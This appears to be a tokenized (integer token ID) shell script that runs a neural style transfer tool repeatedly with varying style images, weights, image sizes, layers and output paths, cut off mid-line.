15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
18,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
18,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
18,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
18,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
604,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
1315,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19,
32,
21,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
4570,
405,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
17620,
62,
1050,
46493,
13,
79,
400,
6,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
2,
30719,
532,
4019,
10744,
10,
767,
2167,
87,
22,
2167,
2939,
357,
4360,
5640,
13020,
287,
6228,
9568,
3006,
8,
198,
2,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
19,
6,
532,
7635,
62,
6551,
20007,
532,
7635,
62,
9888,
657,
13,
20,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
19,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
19006,
62,
19,
13,
11134,
6,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
657,
532,
9060,
62,
7857,
767,
2167,
532,
22510,
62,
2676,
602,
838,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
35073,
62,
320,
11286,
316,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
7635,
62,
75,
6962,
823,
84,
15,
11,
260,
2290,
16,
532,
40085,
7509,
23197,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
32,
23,
12,
37,
17961,
12,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
198,
2,
45537,
2,
198,
2,
3563,
56,
2538,
642,
1303,
198,
2,
45537,
2,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
15003,
4738,
532,
40684,
62,
4873,
352,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
22243,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
16,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
220,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
16,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
46720,
532,
22510,
62,
2676,
602,
10053,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
48466,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
17,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
8576,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
17,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
28119,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
18,
13,
11134,
6,
532,
14981,
62,
6551,
657,
13,
2388,
16,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
18,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
20,
62,
16,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
19,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
807,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
642,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
19,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
8646,
532,
9060,
62,
7857,
36641,
532,
22510,
62,
2676,
602,
8576,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
11,
260,
2290,
17,
62,
16,
11,
260,
2290,
17,
62,
17,
11,
260,
2290,
18,
62,
16,
11,
260,
2290,
18,
62,
17,
11,
260,
2290,
18,
62,
18,
11,
260,
2290,
18,
62,
19,
11,
260,
2290,
19,
62,
16,
11,
260,
2290,
19,
62,
17,
11,
260,
2290,
19,
62,
18,
11,
260,
2290,
19,
62,
19,
11,
260,
2290,
20,
62,
16,
11,
260,
2290,
20,
62,
17,
11,
260,
2290,
20,
62,
18,
11,
260,
2290,
20,
62,
19,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
20,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
62,
6551,
604,
2388,
532,
7635,
62,
9888,
352,
532,
11299,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
15414,
14,
15414,
20,
13,
11134,
6,
532,
11299,
62,
6551,
657,
532,
15003,
2939,
532,
15003,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
20,
13,
11134,
6,
532,
4798,
62,
2676,
2026,
532,
21928,
62,
2676,
1802,
532,
9060,
62,
7857,
21431,
532,
22510,
62,
2676,
602,
939,
532,
19849,
62,
7753,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
9122,
13033,
14,
3281,
463,
12,
16072,
77,
2624,
82,
12,
8043,
12,
23701,
13,
79,
400,
6,
532,
11299,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
7635,
62,
75,
6962,
823,
84,
16,
62,
16,
11,
260,
2290,
16,
62,
17,
532,
40085,
7509,
18360,
69,
14542,
532,
22915,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
22915,
14,
20,
32,
21,
13,
11134,
6,
532,
14981,
62,
6551,
657,
532,
46999,
657,
532,
14986,
62,
4033,
669,
657,
532,
1891,
437,
269,
463,
20471,
198,
0,
29412,
17019,
12,
7635,
12,
457,
14,
710,
1523,
62,
7635,
13,
9078,
532,
7635,
62,
9060,
31051,
11299,
14,
70,
19472,
14,
3666,
24825,
14,
45,
4303,
51,
14,
7635,
14,
7635,
20,
6,
532,
7635,
